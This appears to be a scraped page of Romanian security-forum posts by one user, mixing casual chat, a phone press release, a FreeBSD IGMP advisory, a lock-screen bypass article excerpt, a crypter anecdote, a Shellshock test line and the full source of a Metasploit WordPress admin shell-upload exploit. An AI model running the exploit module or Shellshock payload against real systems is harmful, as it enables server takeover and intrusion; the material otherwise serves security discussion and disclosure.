Nytro

Antivirusi cocalari. Cum cacat sa faci "semnaturi" pe baza de Mutex?

Sa ma slobozesc pe jegul lor de client. A fost foarte ok la inceput, dar apoi au inceput sa bage reclame, iar acum... Ca tot veni vorba, aveti si ceva sugestii de alternative? Eu am mai folosit BitTorrent parca, dar nici acela nu imi place. Voi ce mai folositi?

Frumoasa lista.

La multi ani ba, dai un whiskey cand ajung in Bucuresti, stii tu, ca in vremurile bune

10$ / zi => 300$ pe luna. Mai bine te angajezi la Carrefour.

Astept cu nerabdare realizarile voastre.

Am rezolvat problema cu Dislike-urile.

Allview prezint? X2 Soul PRO, noul s?u top de gam? Aurelian Mihai - 3 mar 2015 Prezent la expozi?ia Mobile World Congress de la Barcelona, Allview a dezv?luit X2 Soul PRO, un nou smartphone high-end pentru pia?a din România. Allview X2 Soul PRO p?streaz? trendul în materie de design al gamei SOUL, încercând s? conving? prin performan?ele procesorului octa-core pe 64-bit, ecranul de 5,2” cu rezolu?e Full HD ?i camerele foto de 13MP ?i 8MP. Noul terminal ruleaz? versiunea Android 5.0 Lollipop. zoom inAllview X2 Soul PRO “X2 Soul PRO este un device care inspir? sim?urile ?i i?i adapteaz? culorile UI-ului la mediul înconjur?tor. Pl?cut la atingere ?i la privire, smartphone-ul va surprinde într-un mod pl?cut atât prin performan?? cât ?i prin func?iile sale.” declar? Lucian Peticil?, Managerul General al companiei. X2 Soul PRO se prezint? într-o carcas? de tip unibody, cu grosime de 5,5 mm ?i este construit din metal ?i sticl? rezistent? la zgârieturi. Designul exterior este eviden?iat prin liniile cromate ale ramei ?i combina?ia curburilor cu suprafe?ele drepte. ?asiul intern este realizat din aliaj de aluminiu ?i magneziu, oferind un bun raport rezisten?? mecanic? / greutate. La interior g?sim un acumulator de 2700 mAh, dimensionat pentru o autonomie de pân? la 11 zile în regim stand-by sau 13 ore în convorbire. Ajutat cu modul “Super Power Saving” de economisire a energiei, telefonul promite s? ofere peste 100 ore de utilizare pentru fiecare înc?rcare a bateriei. Construit folosind tehnologia Full Lamination, ecranul Full HD cu densitate 442 ppi promite unghiuri de vizibilitate generoase ?i o bun? calitate a imaginii. În afara comenzilor preluate prin interfa?a touch, Allview X2 Soul PRO suport? ?i controlul prin gesturi, oferind o modalitate comod? pentru accesarea func?iilor de baz?. Camera principal? de 13MP, un model Sony IMX214 cu 6 lentile, este gestionat? cu ajutorul unei aplica?ii de captur? ce include func?ii precum Magic Focus, Tracks, Best Face, Best Image, Eraser, mod Profesional sau posibilitatea de separare a focusului de expunere. Similar, camera frontal? de 8MPpoate fi utilizat? pentru apeluri video ?i poze selfie, dispunând de toate filtrele men?ionate mai sus. Configura?ia este completat? cu 2GB memorie RAM ?i GPU Mali-T760 MP2 cu frecven?? de 700MHz, dou? sloturi pentru cartel? SIM ?i conectivitate 4G, func?ionând în standardele LTE FDD ?i TDD. Telefonul Allview X2 Soul PRO este disponibil începând de ast?zi pe baz? de precomand? la pre?ul de1699 lei. Sursa: Allview prezint? X2 Soul PRO, noul s?u top de gam? Buna treaba.

Deci ce au facut ilegal?

sbutton? Nu e niciun "sbutton". A testat careva? PS: Am dezactivat temporar pe RST.

Trebuie sa stii bine OOP. Cred ca asta e criteriul de baza. Citeste tot de aici: PHP: Classes and Objects - Manual sau cauta articole pe aceasta tema. Trebuie sa stii sa faci niste SELECT-uri, un JOIN si un INSERT. Trebuie sa stii HTML5/CSS3/JS/jQuery - cel putin elementele de baza: tag-uri/reguli/notiuni de baza/selectori... Uita-te si peste un framework. Zend as sugera eu, dar nu sunt expert. Poate te ajuta @Birkoff

Aduceti si argumente.

Intercepting functions from statically linked libraries January 28, 2015 Ionut Popescu A common technique for blackbox penetration testing of a binary application is intercepting function calls. This technique helps the pentester to properly understand how the application works and to manipulate application data. The problem In most cases, it is pretty easy to intercept a function call: the application calls a function from a shared library (DLL) and you just need to find its address in the DLL’s export address table and breakpoint on it.But it may happen that your target function is from a statically linked library, which means that you cannot find its address by name in the export table. So how to find the target function’s address in this situation? In our case, we have a Windows executable statically linked with OpenSSL and we want to intercept and modify the TLS encrypted traffic which is handled by the SSL_writefunction from OpenSSL.However, the same idea can be applied for other operating systems and libraries. Sursa: Intercepting functions from statically linked libraries – Security Café

Niste jegosi.

1. Ambele - Aplicatiile importante exista pentru ambele platforme 2. Java + Android specific 3. Objective C - iOS specific

Ai fi surprins sa afli pe la ce firme lucreaza persoane de pe aici sau fosti membri.

FreeBSD Security Advisory - IGMP Integer Overflow Authored by Marek Kroemeke, Mateusz Kocielski | Site security.freebsd.org FreeBSD Security Advisory - An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= FreeBSD-SA-15:04.igmp Security Advisory The FreeBSD Project Topic: Integer overflow in IGMP protocol Category: core Module: igmp Announced: 2015-02-25 Credits: Mateusz Kocielski, Logicaltrust, Marek Kroemeke, and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 Affects: All supported versions of FreeBSD. Corrected: 2015-02-25 05:43:02 UTC (stable/10, 10.1-STABLE) 2015-02-25 05:56:16 UTC (releng/10.1, 10.1-RELEASE-p6) 2015-02-25 05:56:16 UTC (releng/10.0, 10.0-RELEASE-p18) 2015-02-25 05:43:02 UTC (stable/9, 9.3-STABLE) 2015-02-25 05:56:54 UTC (releng/9.3, 9.3-RELEASE-p10) 2015-02-25 05:43:02 UTC (stable/8, 8.4-STABLE) 2015-02-25 05:56:54 UTC (releng/8.4, 8.4-RELEASE-p24) CVE Name: CVE-2015-1414 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:https://security.FreeBSD.org/>. I. Background IGMP is a control plane protocol used by IPv4 hosts and routers to propagate multicast group membership information. IGMP version 3 is implemented on FreeBSD. II. Problem Description An integer overflow in computing the size of IGMPv3 data buffer can result in a buffer which is too small for the requested operation. III. Impact An attacker who can send specifically crafted IGMP packets could cause a denial of service situation by causing the kernel to crash. IV. Workaround Block incoming IGMP packets by protecting your host/networks with a firewall. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch # fetch https://security.FreeBSD.org/patches/SA-15:04/igmp.patch.asc # gpg --verify igmp.patch.asc Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in <URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r279263 releng/8.4/ r279265 stable/9/ r279263 releng/9.3/ r279265 stable/10/ r279263 releng/10.0/ r279264 releng/10.1/ r279264 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII. References <URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1414> The latest revision of this advisory is available at <URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:04.igmp.asc> -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.1.1 (FreeBSD) iQIcBAEBCgAGBQJU7WjDAAoJEO1n7NZdz2rnjr8QAL0J0+4lRtPXRyDRX2xFSnzw sc3OpfmlTiD3pCFkebTYy3/+EK86iAL1ZELqlJe5mm2+pzhCQB13C4/exc0l1U6b tyiGXxhVi2/4SBrs6n9lmB/YhXkgtqaOQAcNaOD6sVbS1e5cBtjnG86oOq8tQ2qG c7Dvh3HTp9M5fDJtsI40SIpqy3FcKORBfpjYd8jONfSqMnLM2kM8xzwHSv4/X23e GlDKHtIi+1ylD/Qu7Z3S7hqXDTSYjZb1QHc7axDFB6X6nj2Rz3aWS2hPPTypFd3T zTj5DZjgiP7U2LhR40sWW68RYi21yzNUwbe0w5LeDah6Ymc5CDO2ujdm3HDQbQGH pA9QIOjzpgR64nWLIJfZ7jMxL3rCCaCW3NCB/iRXni2Ib/wt3ZDkJyEk/SF4K82H 72U2u2qVjAsnhmwWK8gksBi9bEXk3TnX778bkrwm4rt1xOjACq8k66LAernoE4tB DkE0pO4QR+6XwFb5sJMG/3L9CmrhTp2pkPDBQDbSD+ngBs5V5mJOqVf7gB+UptnN Fh8OACO/5KtDkqBDsCljHxHZNaboVF4Q613+iF5CUc6SYOTkLnBDUE4Pq38vlzVB GdZMEo/hvsCbR4c2TmdKuvEkEqayxCxcv0DXiyTlVCecxSkaYvMXPwCKK43QtS7S het83QCUxaVuxLiznuwR =lkYC -----END PGP SIGNATURE----- Sursa: http://packetstormsecurity.com/files/130557

Maine ai interviul? Nu am fost la Bitdefender, dar am fost la Avira. Postul era de C++ Developer, dar asta nu inseamna ca o sa umbli tu la engine-ul de scanare, probabil postul e pentru tool-uri auxiliare: backup, password manager sau mai stiu eu ce. La mine interviul a avut doua etape (cred): 1. "Interviul" tehnic 2. Discutiile "Interviul tehnic" a fost: ai un calculator cu Visual C++ si conexiune la net. Fa un client TCP care se conecteaza la un server TCP si un server TCP, care suporta mai multi clienti si care raspunde la request-uri. Aveam 3 ore la dispozitie si pentru "punctaj maxim" trebuia sa suporte mai multi clienti, multi-threading, select()... In fine, ideea e ca am facut tot ce trebuia, oricum unde ucrasem inainte facusem astfel de lucruri si mi-a fost foarte usor. La partea a doua insa am stat la discutii cu doua persoane de acolo. Cred ca mi-au pus si intrebari tehnice,probabil de C++ si poate de algoritmica, nu stiu daca si legate de altceva. Partea ciudata a fost ca m-au intrebat la ce proiecte am mai lucrat si le-am zis ca am facut un crypter. Normal, nu stiau ce e acela si le-am explicat ce face: "Pai stiti, face ca un fisier detectabil de antivirus, sa nu mai fie detectabil de antivirus". Nu m-au crezut. Le-am explicat cum functioneaza: "Pai stiti, incarca un executabil in memorie si il executa fara ca acesta sa ajunga pe disk". Tot nu credeau, ziceau ca antivirusul lor stie dintr-astea... In fine. Apoi ma intreaba: "Auzi, dar de ce te-am angaja pe tine, daca te folosesti de sursa antivirusului ca sa faci in continuare cryptere?". Si le raspund cam razand: "Pai stiti, nu am nevoie de sursa antivirusului ca sa fac asa ceva". Nu m-au mai sunat. tl;dr: Sa stii OOP bine: functii virtuale, clase, mostenire si mai stiu eu ce si sa stii binisor algoritmica. Nota: Primesti multe puncte bonus daca ai relatii acolo.

"mario"

https://access.redhat.com/articles/1200223

env X='() { (a)=>\' bash -c 'echo $(date)'; It works...

Nu pare sa mearga.

./clean Nu va mai injurati.

Bypassing Windows Lock Screen via Flash Screensaver February 23, 2015 Adrian Furtuna We have recently discovered an easy method to bypass the Windows Lock screen when a flash screensaver is running.The method allows an attacker to gain unauthorized access to a user’s Windows session if he has physical access to a locked machine. Background info When a user leaves his computer (ex. during a lunch break), he should lock his session in order to prevent other people from doing actions on his behalf.Some computers, mostly in corporate environments, are configured to play a flash animation as screensaver while the computer is locked. This configuration is done by specifying a path to a .scr file that should be played by the flash player – using the following registry key: HKEY_USERS\.DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE Articol complet: http://securitycafe.ro/2015/02/23/bypassing-windows-lock-screen-via-flash-screensaver/

WordPress Admin Shell Upload Authored by Rob Carr | Site metasploit.comThis Metasploit module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used. ### This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Admin Shell Upload', 'Description' => %q{ This module will generate a plugin, pack the payload into it and upload it to a server running WordPress providing valid admin credentials are used. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'DisclosureDate' => 'Feb 21 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']), OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with']) ], self.class) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def generate_plugin(plugin_name, payload_name) plugin_script = %Q{<?php /** * Plugin Name: #{plugin_name} * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)} * Author: #{Rex::Text.rand_text_alpha(10)} * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com * License: GPL2 */ ?>} zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script) zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded) zip end def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? print_good("#{peer} - Authenticated with WordPress") print_status("#{peer} - Preparing payload...") plugin_name = Rex::Text.rand_text_alpha(10) payload_name = "#{Rex::Text.rand_text_alpha(10)}" payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php") zip = generate_plugin(plugin_name, payload_name) print_status("#{peer} - Uploading payload...") uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie) fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded print_status("#{peer} - Executing the payload at #{payload_uri}...") register_files_for_cleanup("#{payload_name}.php") register_files_for_cleanup("#{plugin_name}.php") send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5) end end Sursa: WordPress Admin Shell Upload ? Packet Storm